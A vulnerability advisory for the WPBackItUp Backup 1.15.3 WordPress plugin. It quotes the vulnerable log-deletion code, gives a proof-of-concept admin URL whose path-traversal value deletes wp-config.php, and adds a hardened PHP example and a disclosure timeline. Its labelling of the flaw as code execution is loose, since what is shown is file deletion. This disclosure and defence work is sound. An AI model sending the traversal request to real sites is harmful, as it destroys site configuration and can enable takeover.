Details
- Name : WPBackItUp Backup
- Version : 1.15.3
- Homepage : https://wordpress.org/plugins/wp-backitup/
Type
- Remote Code Execution - RCE
- Vulnerabilities discovered
Description
- Required user access: administrator.
- $_GET['delete_log'] is not escaped before being appended to the log path.
Code
File: wp-content/plugins/wp-backitup/views/support.php
Line: 335 - 343
    private function delete_action() {
        $filename = WPBACKITUP__LOGS_PATH . '/' . $_GET['delete_log'];
        if ( file_exists( $filename ) ) {
            unlink( $filename );
        }
    }
Proof of Concept
- Log in as an administrator user.
- Access the URL:
- http://target/wp-admin/admin.php?page=wp-backitup-support&delete_log=..%2F..%2F..%2F..%2Fwp-config.php
Results
wp-config.php is deleted and the system restarts.
Note
Solution
1.15.4
Release Date – January 3, 2018
- FIX : Fix security issue with delete log
- UPDATE: Admin notice updates
- UPDATE: Enhancements to support WPBackItUp Safe cloud storage
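The changelog does not show how 1.15.4 changed the delete-log handler. The following is an added example, not the vendor's patch, of one way to confine the deletion to the logs directory; the function names, the ".log" allow-list and the temporary sandbox paths are assumptions made for illustration.

```php
<?php
// Added example: hypothetical hardened counterpart of delete_action().
// resolve_log_path(), delete_log() and the ".log" allow-list are assumptions,
// not code from the plugin.

function resolve_log_path(string $logsDir, string $requested): ?string {
    $base = realpath($logsDir);
    if ($base === false) {
        return null;
    }
    // Allow-list: a bare file name ending in .log, with no path separators.
    if (!preg_match('/\A[A-Za-z0-9_.-]+\.log\z/', $requested)
        || $requested !== basename($requested)) {
        return null;
    }
    // Canonicalise (resolves symlinks and dot segments) and confirm the
    // result is a regular file located directly inside the logs directory.
    $target = realpath($base . DIRECTORY_SEPARATOR . $requested);
    if ($target === false || dirname($target) !== $base || !is_file($target)) {
        return null;
    }
    return $target;
}

function delete_log(string $logsDir, string $requested): bool {
    $target = resolve_log_path($logsDir, $requested);
    return $target !== null && unlink($target);
}

// Constructed sandbox: <tmp>/.../wp-config.php and <tmp>/.../logs/debug.log
$site = sys_get_temp_dir() . '/wpbiu_demo_' . bin2hex(random_bytes(4));
$logs = $site . '/logs';
mkdir($logs, 0700, true);
file_put_contents($site . '/wp-config.php', "<?php // constructed stand-in\n");
file_put_contents($logs . '/debug.log', "constructed log line\n");

// Case 1: traversal value of the kind used in the proof of concept.
echo 'traversal deleted: ';       var_dump(delete_log($logs, '../wp-config.php'));
echo 'wp-config still present: '; var_dump(file_exists($site . '/wp-config.php'));
// Case 2: a legitimate log file name.
echo 'log deleted: ';             var_dump(delete_log($logs, 'debug.log'));

// Clean up the constructed sandbox.
unlink($site . '/wp-config.php');
rmdir($logs);
rmdir($site);
```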
Timeline
- Date Discovery : 11/28/2017
- Date Vendor Contact : 12/26/2017
- Date Publish : 01/04/2018
- Date Resolution : 01/03/2018